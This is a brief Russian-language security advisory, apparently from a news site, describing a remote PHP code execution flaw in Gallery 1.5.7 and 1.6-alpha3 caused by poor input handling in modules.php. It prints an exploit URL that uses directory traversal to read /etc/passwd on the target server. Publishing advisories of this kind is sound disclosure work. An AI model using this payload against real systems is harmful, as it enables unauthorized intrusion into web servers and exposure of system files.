Программа: Gallery 1.5.7, 1.6-alpha3

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием modules.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

http://[server]/[installdir]/contrib/phpBB2/modules.php?op= modload&phpEx=../../../../../../../../../../../../../etc/passwd



Оставить мнение